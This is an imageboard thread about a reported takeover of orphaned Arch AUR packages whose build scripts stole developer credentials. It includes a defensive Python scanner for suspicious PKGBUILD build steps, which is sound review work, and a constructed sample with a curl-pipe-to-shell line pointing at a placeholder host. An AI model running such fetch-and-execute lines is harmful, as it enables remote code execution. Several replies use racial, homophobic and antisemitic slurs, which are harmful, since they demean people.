Someone quietly compromised the Arch Linux AUR.
Not the official Arch repos, the community package ecosystem. The trust layer.
Over a few days, orphaned AUR packages were taken over and “updated” like normal.
But the install scripts were modified.
They started pulling hidden dependencies during build time.
npm and bun packages.
Droppers written in Rust.
Stealing developer data silently in the background.
SSH keys. Git tokens. Browser sessions. API keys. Vault secrets. Messaging app sessions.
Anything stored on a dev machine was fair game.
In some cases, it escalated further.
Using eBPF to hook into the Linux kernel and hide itself from system tools like ps and htop.
Processes that exist, but don’t show up.
Files that exist, but don’t appear.
Network connections you can’t easily see.
All routed out through encrypted channels, with Tor used for command-and-control in some reports.
And the worst part?
It didn’t feel like malware at install time.
It felt like a normal AUR update.
That’s the point.
Trust got abused at the build-script level, not the application level.
Hundreds of packages were flagged before cleanup began.
Official Arch repos stayed untouched.
But if you updated AUR packages in that window, the assumption shifts fast: credentials are compromised until proven otherwise.
Rotate keys. Revoke tokens. Rebuild trust from scratch if needed.
Because in systems like this, the code you didn’t read is the code that runs you.
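The OP's point is that the abuse sat in the build script, not the packaged application: a PKGBUILD declares its downloads in source=() with checksums, so a prepare()/build()/package() function that quietly runs npm, bun, curl or a pipe-to-shell on its own is exactly the thing a reviewer should see before makepkg runs it. The following is an added example, not code from this thread, from Arch or from any AUR helper: a small heuristic scanner that walks the shell functions makepkg executes on the builder's machine and flags network fetches and decode-and-run constructs inside them. Both PKGBUILD texts are constructed for the example, and example.invalid is a reserved placeholder host, not a real mirror.

```python
"""
Added example (not part of the thread or of any Arch tooling):
flag build-time fetches hidden in PKGBUILD shell functions.
makepkg expects every download in source=(); anything that fetches
from inside prepare()/build()/check()/package()/pkgver() bypasses
the checksum list and deserves a human look before building.
"""
import re

# Functions makepkg runs on the builder's own machine.
MAKEPKG_FUNCS = ("prepare", "build", "check", "package", "pkgver")

# Heuristic patterns; each match is a reason to read the line, not proof of malice.
SUSPECT_PATTERNS = [
    (r"\bcurl\b", "curl download in build function"),
    (r"\bwget\b", "wget download in build function"),
    (r"\bnpm\s+(i|install|ci)\b", "npm fetching packages at build time"),
    (r"\bbun\s+(i|install|add)\b", "bun fetching packages at build time"),
    (r"\bpip3?\s+install\b", "pip fetching packages at build time"),
    (r"\bcargo\s+install\b", "cargo fetching a crate at build time"),
    (r"\bgit\s+clone\b", "git clone not declared in source=()"),
    (r"\|\s*(ba)?sh\b", "piping data into a shell"),
    (r"\bbase64\s+(-d|--decode)\b", "decoding an embedded payload"),
    (r"\beval\b", "eval of a constructed command"),
]

FUNC_HEADER = re.compile(r"^\s*(\w+)\s*\(\)\s*\{?\s*$")


def iter_function_bodies(text):
    """Yield (function_name, line_no, line) for every line inside a
    top-level shell function, using brace depth to find its end."""
    name, depth = None, 0
    for line_no, line in enumerate(text.splitlines(), start=1):
        if name is None:
            m = FUNC_HEADER.match(line)
            if m:
                name = m.group(1)
                depth = line.count("{") - line.count("}")
            continue
        yield name, line_no, line
        depth += line.count("{") - line.count("}")
        if depth <= 0:
            name = None


def find_build_time_fetches(text):
    """Return [(function, line_no, reason, code)] for suspect commands
    inside the functions makepkg runs. Comments are stripped first so a
    commented-out line does not trigger a finding."""
    findings = []
    for name, line_no, line in iter_function_bodies(text):
        if name not in MAKEPKG_FUNCS:
            continue
        code = re.sub(r"(^|\s)#.*$", "", line).strip()
        if not code:
            continue
        for pattern, reason in SUSPECT_PATTERNS:
            if re.search(pattern, code):
                findings.append((name, line_no, reason, code))
                break
    return findings


# Constructed sample: a normal PKGBUILD, everything fetched via source=().
CLEAN_PKGBUILD = """\
pkgname=example-tool
pkgver=1.2.0
pkgrel=1
source=("https://example.invalid/example-tool-$pkgver.tar.gz")
sha256sums=('SKIP')

build() {
    cd "$srcdir/$pkgname-$pkgver"
    make
}

package() {
    cd "$srcdir/$pkgname-$pkgver"
    make DESTDIR="$pkgdir" install
}
"""

# Constructed sample: the same package after a "routine" update that adds
# an undeclared bun install and a curl-pipe-to-shell in the build functions.
TAMPERED_PKGBUILD = """\
pkgname=example-tool
pkgver=1.2.1
pkgrel=1
source=("https://example.invalid/example-tool-$pkgver.tar.gz")
sha256sums=('SKIP')

prepare() {
    cd "$srcdir/$pkgname-$pkgver"
    # "helper" not declared in source=(): fetched at build time
    bun install example-helper-package
}

build() {
    cd "$srcdir/$pkgname-$pkgver"
    curl -s https://example.invalid/setup | sh   # constructed, not a real host
    make
}

package() {
    cd "$srcdir/$pkgname-$pkgver"
    make DESTDIR="$pkgdir" install
}
"""

if __name__ == "__main__":
    for label, text in (("clean", CLEAN_PKGBUILD), ("tampered", TAMPERED_PKGBUILD)):
        print(f"== {label} ==")
        for fn, ln, reason, code in find_build_time_fetches(text):
            print(f"{fn}() line {ln}: {reason}: {code}")
```

Running it reports nothing for the clean file and two findings for the tampered one (the bun install in prepare() and the curl-pipe-to-shell in build()). It is deliberately a review aid, not a verdict: a legitimate language package may well run npm in build(), which is why the output names the function and line so you can read the diff between the previous and the "updated" PKGBUILD rather than trust the bump.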
Don't forget to update as soon as they are available goy
>>109047545 Holy Reddit spacing, Batman.
We dont do this in fedora linux
>>109047612 it's probably AI translated
>>109047545
>orphaned AUR packages were taken over
Found the problem.
>>109047624
>probably
would simply running yay -Yc or equivalent be a viable fix for those affected by the malware?
>>109047545 oh hey didn't mythos exfiltrate itself as a joke when a researcher asked and isn't bun owned by anthropic and they use rust internally haha
>>109047630 Yeah, how the fuck did these AUR jannies let that thing go on for so long? Having literally whos claiming ownership of orphaned packages was a ticking time bomb ready to explode on every Archnigger's face. They should get rid of that ASAP. We are living in an era where every faggot can vibecode malware. People can't be trusted anymore
>>109047658 I can tell by the prose and from having seen quite a few AI posts in my time
Brother, if I had $1 for every LF you just used
>>109047545 thank you llmjeet. very entergaging.
>Nothing to do with us, it's a user problem, never mind that it's got our branding all over it, no, not our problem, even though we're now cleaning it up.
Arch fags want their cake and eat it too.
(and no, my install has zero AUR shit going on)
>>109047545
>The trust layer
Nobody with a brain implicitly trusts users.